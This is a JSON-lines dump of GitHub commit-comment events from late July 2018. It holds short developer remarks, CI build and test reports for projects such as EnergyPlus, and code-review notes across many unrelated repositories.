{"id":"8034851813","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29877911,"position":null,"line":null,"path":null,"commit_id":"0ecf99025e24c9561d911ac63800192549542819","created_at":"2018-07-29T23:48:31Z","updated_at":"2018-07-29T23:48:31Z","author_association":"NONE","body":"most of tommorrow normal hours i hope"}},"created_at":"2018-07-29T23:48:31Z"}
{"id":"8034853502","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"Sidoine/Ovale"},"payload":{"comment":{"id":29877918,"position":null,"line":null,"path":null,"commit_id":"a1b0ceb9d5ab6041dfd83fee2c03aaa24f7b4795","created_at":"2018-07-29T23:49:54Z","updated_at":"2018-07-29T23:49:54Z","author_association":"CONTRIBUTOR","body":"@Sidoine As far as just having ovale functional, I believe the most functional is https://github.com/mwojtkowski/Ovale\r\n\r\nHe's done a bunch of stuff and I just overhauled the equipment module (probably going to do paperdoll next, had it started a little) as well as a few other things.  There's just a ton of old stuff in there that's no longer necessary I'm working on going around removing it.\r\n\r\nIf there's particular modules that you're planning on updating that you want me to stay away from let me know, otherwise I'll just keep plugging away. "}},"created_at":"2018-07-29T23:49:54Z"}
{"id":"8034856825","type":"CommitCommentEvent","actor":{"login":"dzhulu"},"repo":{"name":"dzhulu/Portfolio_Sample"},"payload":{"comment":{"id":29877931,"position":null,"line":null,"path":null,"commit_id":"4494810c537eaf3b8bab20928f4c030a81ce99f5","created_at":"2018-07-29T23:52:20Z","updated_at":"2018-07-29T23:52:20Z","author_association":"OWNER","body":"Oh yeah? Prove it?"}},"created_at":"2018-07-29T23:52:20Z"}
{"id":"8034858354","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29877935,"position":null,"line":null,"path":null,"commit_id":"0849bd6e7224df6135df53444fe78b8995cb3ac6","created_at":"2018-07-29T23:53:37Z","updated_at":"2018-07-29T23:53:37Z","author_association":"CONTRIBUTOR","body":"Cà générait ~300-400 lignes dans le rapport de traduction. Il y en aura encore pour les tags avec des chiffres (surtout UNUSED)"}},"created_at":"2018-07-29T23:53:37Z"}
{"id":"8034861657","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29877939,"position":null,"line":null,"path":null,"commit_id":"bfa3385aedd4616d5b6beefe9fdfa8f02785bffc","created_at":"2018-07-29T23:56:05Z","updated_at":"2018-07-29T23:56:05Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-29T23:56:05Z"}
{"id":"8033268149","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29872036,"position":null,"line":null,"path":null,"commit_id":"27c86f86e380ae4ab621301134bcd124372f1f29","created_at":"2018-07-29T03:01:28Z","updated_at":"2018-07-29T03:01:28Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-440](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-440).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-440-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-29T03:01:28Z"}
{"id":"8033268313","type":"CommitCommentEvent","actor":{"login":"radarnews"},"repo":{"name":"radarnews/playermega"},"payload":{"comment":{"id":29872038,"position":null,"line":null,"path":null,"commit_id":"910bb9eeed3e25cf98e492f19c5b78d9ff75a42a","created_at":"2018-07-29T03:01:36Z","updated_at":"2018-07-29T03:01:36Z","author_association":"OWNER","body":"player de video"}},"created_at":"2018-07-29T03:01:36Z"}
{"id":"8033268578","type":"CommitCommentEvent","actor":{"login":"robinst"},"repo":{"name":"trishume/syntect"},"payload":{"comment":{"id":29872039,"position":null,"line":null,"path":null,"commit_id":"8dd7d4031cf0789f79195b175d4d6771ef96a111","created_at":"2018-07-29T03:01:52Z","updated_at":"2018-07-29T03:01:52Z","author_association":"COLLABORATOR","body":"Thanks! ♥️"}},"created_at":"2018-07-29T03:01:52Z"}
{"id":"8033269264","type":"CommitCommentEvent","actor":{"login":"cocoitali"},"repo":{"name":"cocoitali/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29872041,"position":null,"line":null,"path":null,"commit_id":"1e615aae1f50c87a01a6e7eb53008324d1668781","created_at":"2018-07-29T03:02:33Z","updated_at":"2018-07-29T03:02:33Z","author_association":"OWNER","body":"Modified about.html and index.css.\r\n Layout finished.\r\nNeed to play around with size, margins and padding."}},"created_at":"2018-07-29T03:02:33Z"}
{"id":"8033271598","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872044,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T03:04:53Z","updated_at":"2018-07-29T03:04:53Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-29T03:04:53Z"}
{"id":"8033273538","type":"CommitCommentEvent","actor":{"login":"Bmsky"},"repo":{"name":"2Guys1Plane/ComatoseGrape"},"payload":{"comment":{"id":29872057,"position":4,"line":4,"path":"README.md","commit_id":"9730b406a895856ece2b87c237ef027c41f99cdf","created_at":"2018-07-29T03:06:58Z","updated_at":"2018-07-29T03:06:58Z","author_association":"CONTRIBUTOR","body":"Ther comes a time when your chromosomes max out so you need to prestige back to lvl chrome"}},"created_at":"2018-07-29T03:06:58Z"}
{"id":"8033273703","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872061,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T03:07:09Z","updated_at":"2018-07-29T03:07:09Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2347 of 2347 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-29T03:07:09Z"}
{"id":"8033273908","type":"CommitCommentEvent","actor":{"login":"li23124302"},"repo":{"name":"li23124302/hello-world"},"payload":{"comment":{"id":29872062,"position":null,"line":null,"path":null,"commit_id":"a59e1ef19f3fb8ebb9c4b53647dc9da0bfdcf424","created_at":"2018-07-29T03:07:22Z","updated_at":"2018-07-29T03:07:22Z","author_association":"OWNER","body":"third"}},"created_at":"2018-07-29T03:07:22Z"}
{"id":"8033275530","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/linuxcontainers.org"},"payload":{"comment":{"id":29872065,"position":14,"line":14,"path":"content/lxd/news.ja/lxd-3.2.yaml","commit_id":"a83fa8ac30cf832a7da48e5d0b87c14aace8c766","created_at":"2018-07-29T03:09:05Z","updated_at":"2018-07-29T03:09:05Z","author_association":"NONE","body":"細かいですが「大きな乖離がなくす」は「大きな乖離をなくす」のほうが良いと思いいます。"}},"created_at":"2018-07-29T03:09:05Z"}
{"id":"8033276039","type":"CommitCommentEvent","actor":{"login":"mchlp"},"repo":{"name":"brandongit2/math"},"payload":{"comment":{"id":29872066,"position":null,"line":null,"path":null,"commit_id":"5d9f938a7789704f636875cfb187a72375c1c6fc","created_at":"2018-07-29T03:09:39Z","updated_at":"2018-07-29T03:09:39Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Prevent Async Task Execution in Main Node.js File](https://trello.com/c/XWpA9xkE/5-prevent-async-task-execution-in-main-nodejs-file)"}},"created_at":"2018-07-29T03:09:39Z"}
{"id":"8033276390","type":"CommitCommentEvent","actor":{"login":"mchlp"},"repo":{"name":"brandongit2/math"},"payload":{"comment":{"id":29872068,"position":null,"line":null,"path":null,"commit_id":"6786e89b180fe7da8e72373a762d72a66703741d","created_at":"2018-07-29T03:10:05Z","updated_at":"2018-07-29T03:10:05Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add `--dev` and `--prod` flags to `gulp build` command](https://trello.com/c/U4sVTRnQ/4-add-dev-and-prod-flags-to-gulp-build-command)"}},"created_at":"2018-07-29T03:10:05Z"}
{"id":"8033277974","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"IIvec/Stockfish"},"payload":{"comment":{"id":29872078,"position":null,"line":null,"path":null,"commit_id":"227c933f47016980c0922be465ee762c8fb040c0","created_at":"2018-07-29T03:11:47Z","updated_at":"2018-07-29T03:11:47Z","author_association":"NONE","body":"The framework is becoming empty, so I started a LTC on your behalf:\r\nhttp://tests.stockfishchess.org/tests/view/5b5d2fa00ebc5902bdb90855\r\n\r\nI hope this OK.  Good luck!"}},"created_at":"2018-07-29T03:11:47Z"}
{"id":"8033279232","type":"CommitCommentEvent","actor":{"login":"nschneid"},"repo":{"name":"nert-gu/Xposition"},"payload":{"comment":{"id":29872083,"position":4,"line":231,"path":"wiki/plugins/macros/mdx/macro.py","commit_id":"6ffa4ef9c4f11a62a3f827e0c0c849bdbf687cc9","created_at":"2018-07-29T03:13:00Z","updated_at":"2018-07-29T03:13:00Z","author_association":"CONTRIBUTOR","body":"This may work but it would be good to escape the braces to show they're not regex metacharacters: `r'\\{(?P<tok_gloss>[^}]*)\\}'`"}},"created_at":"2018-07-29T03:13:00Z"}
{"id":"8033279352","type":"CommitCommentEvent","actor":{"login":"SuslikV"},"repo":{"name":"obsproject/obs-studio"},"payload":{"comment":{"id":29872084,"position":null,"line":null,"path":null,"commit_id":"2d60c89a02e5f1559603ed83de08a05e2077101a","created_at":"2018-07-29T03:13:06Z","updated_at":"2018-07-29T03:13:06Z","author_association":"CONTRIBUTOR","body":"It is bad idea to depend on buttons."}},"created_at":"2018-07-29T03:13:06Z"}
{"id":"8033279434","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872087,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T03:13:09Z","updated_at":"2018-07-29T03:13:09Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-29T03:13:09Z"}
{"id":"8033280757","type":"CommitCommentEvent","actor":{"login":"stevMike"},"repo":{"name":"stevMike/tounaWeb"},"payload":{"comment":{"id":29872093,"position":null,"line":null,"path":null,"commit_id":"66b5feb926f3ff0d380a5b154b5e9eb0e7251b57","created_at":"2018-07-29T03:14:33Z","updated_at":"2018-07-29T03:14:33Z","author_association":"OWNER","body":"浦发项目"}},"created_at":"2018-07-29T03:14:33Z"}
{"id":"8033280915","type":"CommitCommentEvent","actor":{"login":"stevMike"},"repo":{"name":"stevMike/tounaWeb"},"payload":{"comment":{"id":29872094,"position":null,"line":null,"path":null,"commit_id":"66b5feb926f3ff0d380a5b154b5e9eb0e7251b57","created_at":"2018-07-29T03:14:43Z","updated_at":"2018-07-29T03:14:43Z","author_association":"OWNER","body":"浦发项目"}},"created_at":"2018-07-29T03:14:43Z"}
{"id":"8033281239","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29872096,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-29T03:15:04Z","updated_at":"2018-07-29T03:15:04Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-29T03:15:04Z"}
{"id":"8033283952","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/linuxcontainers.org"},"payload":{"comment":{"id":29872108,"position":null,"line":null,"path":null,"commit_id":"a83fa8ac30cf832a7da48e5d0b87c14aace8c766","created_at":"2018-07-29T03:17:35Z","updated_at":"2018-07-29T03:17:35Z","author_association":"NONE","body":"https://github.com/tenforward/linuxcontainers.org/commit/a83fa8ac30cf832a7da48e5d0b87c14aace8c766#r29872065\r\n以外はバッチリだと思います :+1:"}},"created_at":"2018-07-29T03:17:35Z"}
{"id":"8033284988","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29872115,"position":null,"line":null,"path":null,"commit_id":"dc18e32e49db2fe39940ab76673c05ebafb9c356","created_at":"2018-07-29T03:18:39Z","updated_at":"2018-07-29T03:18:39Z","author_association":"NONE","body":"Did you mean to submit this test as [0, 4]?  It's submitted as [0, 5]."}},"created_at":"2018-07-29T03:18:39Z"}
{"id":"8033285592","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29872116,"position":null,"line":null,"path":null,"commit_id":"e199d847187363e5b4638362f07b1159aa0b04d8","created_at":"2018-07-29T03:19:17Z","updated_at":"2018-07-29T03:19:17Z","author_association":"MEMBER","body":"#49 "}},"created_at":"2018-07-29T03:19:17Z"}
{"id":"8033285759","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29872117,"position":null,"line":null,"path":null,"commit_id":"efc7201bba413d1ce5c919d5043561b90569173a","created_at":"2018-07-29T03:19:27Z","updated_at":"2018-07-29T03:19:27Z","author_association":"MEMBER","body":"#49 "}},"created_at":"2018-07-29T03:19:27Z"}
{"id":"8033286920","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29872122,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-29T03:20:35Z","updated_at":"2018-07-29T03:20:35Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-29T03:20:35Z"}
{"id":"8033288154","type":"CommitCommentEvent","actor":{"login":"chrispalasz"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29872127,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-29T03:21:50Z","updated_at":"2018-07-29T03:21:50Z","author_association":"NONE","body":"This is a good thing, and does not reflect on CobraBitcoin or the good job he has done in maintaining Bitcoin.org. This reflects the community's desire to show that Bitcoin is a community and that there are many websites out there with great resources, and that Bitcoin.org does not represent the only place. \r\n\r\nI think Bitcoiners who care about Bitcoin have just imagined a scenario where bitcoin.org DOES get compromised. It's better to begin the detachment now rather than waiting for something to actually go wrong someday.\r\n\r\nEven with this merge, bitcoin.org will always have importance and be a great resource for beginners. And also, now CobraBitcoin can feel free from criticism, to at as benevolent dictator of the website and put his sponsor info wherever he wants. (for me personally, the unresolved but overruled sponsor discussion was displeasing)."}},"created_at":"2018-07-29T03:21:50Z"}
{"id":"8033296958","type":"CommitCommentEvent","actor":{"login":"caleblloyd"},"repo":{"name":"boxboat/okta-nginx"},"payload":{"comment":{"id":29872156,"position":147,"line":122,"path":"server.go","commit_id":"debe7684b5055d24b611d8ea7fdfd355416f63e6","created_at":"2018-07-29T03:31:16Z","updated_at":"2018-07-29T03:31:16Z","author_association":"MEMBER","body":"the `nginx` user needs to be able to read/write, needs to be `0666`"}},"created_at":"2018-07-29T03:31:16Z"}
{"id":"8033296988","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29872157,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-29T03:31:17Z","updated_at":"2018-07-29T03:31:17Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2368 of 2935 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 563 tests had: Table big diffs.\n * 79 tests had: ESO big diffs.\n * 91 tests had: AUD diffs.\n * 157 tests had: BND diffs.\n * 172 tests had: ESO small diffs.\n * 152 tests had: MDD diffs.\n * 157 tests had: MTD diffs.\n * 152 tests had: RDD diffs.\n * 36 tests had: MTR big diffs.\n * 102 tests had: MTR small diffs.\n * 19 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 56\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.68%25-red.png)</a> \n"}},"created_at":"2018-07-29T03:31:17Z"}
{"id":"8033299397","type":"CommitCommentEvent","actor":{"login":"juunnnnnnnn"},"repo":{"name":"juunnnnnnnn/NeuralNetwork"},"payload":{"comment":{"id":29872167,"position":null,"line":null,"path":null,"commit_id":"36cc904092e82809c95abe94c0a403b767c04df4","created_at":"2018-07-29T03:33:52Z","updated_at":"2018-07-29T03:33:52Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-29T03:33:52Z"}
{"id":"8033303199","type":"CommitCommentEvent","actor":{"login":"ctrezevant"},"repo":{"name":"pavel-kolesnikov/go-tuplespace"},"payload":{"comment":{"id":29872177,"position":null,"line":null,"path":null,"commit_id":"1c6f46b2956ccab536eaaaaf6dd0d221329d2db1","created_at":"2018-07-29T03:38:04Z","updated_at":"2018-07-29T03:38:04Z","author_association":"NONE","body":"I came across the repo for https://github.com/nyarla/go-tuplespace and was just about to implement this, myself- Nice work :)"}},"created_at":"2018-07-29T03:38:04Z"}
{"id":"8033303453","type":"CommitCommentEvent","actor":{"login":"Paulwormald"},"repo":{"name":"blipn/LiveBoxTV-PC-Remote"},"payload":{"comment":{"id":29872178,"position":null,"line":null,"path":null,"commit_id":"39f3e78f71e682565437ac38a1f048c19ed0abc5","created_at":"2018-07-29T03:38:19Z","updated_at":"2018-07-29T03:38:19Z","author_association":"NONE","body":"How do I install this livebox remote on my pc to use because I am lost trying ?"}},"created_at":"2018-07-29T03:38:19Z"}
{"id":"8033304475","type":"CommitCommentEvent","actor":{"login":"y2439915698"},"repo":{"name":"y2439915698/mygit"},"payload":{"comment":{"id":29872179,"position":null,"line":null,"path":null,"commit_id":"1681ff1844da3480c93b9efb41f3acaf3a2c2186","created_at":"2018-07-29T03:39:23Z","updated_at":"2018-07-29T03:39:23Z","author_association":"OWNER","body":"abc"}},"created_at":"2018-07-29T03:39:23Z"}
{"id":"8033306090","type":"CommitCommentEvent","actor":{"login":"kamehta2"},"repo":{"name":"kamehta2/HS68_2018_Project_1"},"payload":{"comment":{"id":29872188,"position":10,"line":19,"path":"hs628_tools/normalization_tool.py","commit_id":"5093a9ae47bdbedfb5c36a8fd2317e074c8d893d","created_at":"2018-07-29T03:40:42Z","updated_at":"2018-07-29T03:40:42Z","author_association":"OWNER","body":"Yes, Haley, you are absolutely right.  If rowwise_missing_entries is less than len(alldata) then a boolean value \"True\" will be stored in the local variable named \"data_nocategory_columns\", and otherwise it will be a \"False\"."}},"created_at":"2018-07-29T03:40:42Z"}
{"id":"8033313233","type":"CommitCommentEvent","actor":{"login":"jiru"},"repo":{"name":"Tatoeba/tatoeba2"},"payload":{"comment":{"id":29872201,"position":4,"line":31,"path":"app/View/Helper/LicenseHelper.php","commit_id":"a9c01ac3e45208ef2248caffa298d60d92391f25","created_at":"2018-07-29T03:46:51Z","updated_at":"2018-07-29T03:46:51Z","author_association":"MEMBER","body":"Yes, it is intended to be here, because the code won’t work if this assertion fails. I don’t get this warning on my VM. Can you reproduce this on dev.tatoeba.org (I set up the sentence-licensing branch there)?"}},"created_at":"2018-07-29T03:46:51Z"}
{"id":"8033313705","type":"CommitCommentEvent","actor":{"login":"xiaozhoubest"},"repo":{"name":"xiaozhoubest/lala"},"payload":{"comment":{"id":29872203,"position":null,"line":null,"path":null,"commit_id":"da7ac16d0aefabc7f47166d795dee7e1c5ea8fa9","created_at":"2018-07-29T03:47:19Z","updated_at":"2018-07-29T03:47:19Z","author_association":"OWNER","body":"你好吗"}},"created_at":"2018-07-29T03:47:19Z"}
{"id":"8033314029","type":"CommitCommentEvent","actor":{"login":"xiaozhoubest"},"repo":{"name":"xiaozhoubest/lala"},"payload":{"comment":{"id":29872204,"position":null,"line":null,"path":null,"commit_id":"da7ac16d0aefabc7f47166d795dee7e1c5ea8fa9","created_at":"2018-07-29T03:47:39Z","updated_at":"2018-07-29T03:47:39Z","author_association":"OWNER","body":"我很好啊"}},"created_at":"2018-07-29T03:47:39Z"}
{"id":"8033318642","type":"CommitCommentEvent","actor":{"login":"btshadeed"},"repo":{"name":"btshadeed/HW-Wireframe"},"payload":{"comment":{"id":29872215,"position":null,"line":null,"path":null,"commit_id":"0094603718b1045bde34314e9714c6f272202aa8","created_at":"2018-07-29T03:52:06Z","updated_at":"2018-07-29T03:52:06Z","author_association":"OWNER","body":"It isn't 100% per the layout, I struggled to get this far."}},"created_at":"2018-07-29T03:52:06Z"}
{"id":"8033321918","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29872223,"position":null,"line":null,"path":null,"commit_id":"cf78a31239926cad63a5dc66467cb3a048d42d8d","created_at":"2018-07-29T03:55:10Z","updated_at":"2018-07-29T03:55:10Z","author_association":"NONE","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2018-07-29T03:55:10Z"}
{"id":"8033322365","type":"CommitCommentEvent","actor":{"login":"leleobhz"},"repo":{"name":"zerotier/ZeroTierOne"},"payload":{"comment":{"id":29872225,"position":null,"line":null,"path":null,"commit_id":"d724af6a99b3698bd396801f0b1ba64a5378fc94","created_at":"2018-07-29T03:55:41Z","updated_at":"2018-07-29T03:55:41Z","author_association":"NONE","body":"Hello!\r\n\r\nJust a question: Why did you changed São Paulo to Buenos Aires? I cant remember Argentina with better world connectivity since AFAIK all South America passes with IP Transit via São Paulo or Fortaleza or via the Pacific Globenet cable.\r\n\r\nThanks!"}},"created_at":"2018-07-29T03:55:41Z"}
{"id":"8033322493","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/future_fstrings-feedstock"},"payload":{"comment":{"id":29872226,"position":null,"line":null,"path":null,"commit_id":"fac51876d8dbd63c9523f494caff8c2b74923afa","created_at":"2018-07-29T03:55:49Z","updated_at":"2018-07-29T03:55:49Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @sterlingbaldwin, @deadsnakes-issues-bot were added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-29T03:55:49Z"}
{"id":"8033324247","type":"CommitCommentEvent","actor":{"login":"whackashoe"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29872232,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-29T03:57:51Z","updated_at":"2018-07-29T03:57:51Z","author_association":"NONE","body":"@chrispalasz \r\n\r\n>  Also removing the link to bitcoin.org, to not imply there is only one resource that educates about bitcoin.\r\n\r\nWhy is this  _replacing_ a link with another site instead of adding more sites then? \r\n\r\n---\r\n\r\n> I think Bitcoiners who care about Bitcoin have just imagined a scenario where bitcoin.org DOES get compromised. It's better to begin the detachment now rather than waiting for something to actually go wrong someday.\r\n\r\nBitcoincore.org is already compromised.."}},"created_at":"2018-07-29T03:57:51Z"}
{"id":"8033327189","type":"CommitCommentEvent","actor":{"login":"K00ry"},"repo":{"name":"K00ry/web_app_dashboard_v2"},"payload":{"comment":{"id":29872243,"position":null,"line":null,"path":null,"commit_id":"8b320adcaf1eab7b802714db9d7c575dfb5673c4","created_at":"2018-07-29T04:00:48Z","updated_at":"2018-07-29T04:00:48Z","author_association":"OWNER","body":"Tweeks  to showcase!"}},"created_at":"2018-07-29T04:00:48Z"}
{"id":"8033330575","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872251,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T04:04:09Z","updated_at":"2018-07-29T04:04:09Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-29T04:04:09Z"}
{"id":"8033336547","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"mgkao/Win-Last-Mile-Token-ICO"},"payload":{"comment":{"id":29872259,"position":null,"line":null,"path":null,"commit_id":"797ec8b2967d1ae65d690798e2b258067bd148e9","created_at":"2018-07-29T04:10:23Z","updated_at":"2018-07-29T04:10:23Z","author_association":"NONE","body":"The win"}},"created_at":"2018-07-29T04:10:23Z"}
{"id":"8033340361","type":"CommitCommentEvent","actor":{"login":"faidzal"},"repo":{"name":"faidzal/mahawangsa"},"payload":{"comment":{"id":29872268,"position":null,"line":null,"path":null,"commit_id":"e0a42965c657abfc368c0a76cd39d57627d4946f","created_at":"2018-07-29T04:13:57Z","updated_at":"2018-07-29T04:13:57Z","author_association":"OWNER","body":"just read the readme files"}},"created_at":"2018-07-29T04:13:57Z"}
{"id":"8033349199","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29872278,"position":null,"line":null,"path":null,"commit_id":"9d3da2ceb7bd1e839fa5971042b8adbbd1348095","created_at":"2018-07-29T04:21:10Z","updated_at":"2018-07-29T04:21:10Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2330 of 2330 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d3da2ceb7bd1e839fa5971042b8adbbd1348095-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.21%25-green.png)</a>\n"}},"created_at":"2018-07-29T04:21:10Z"}
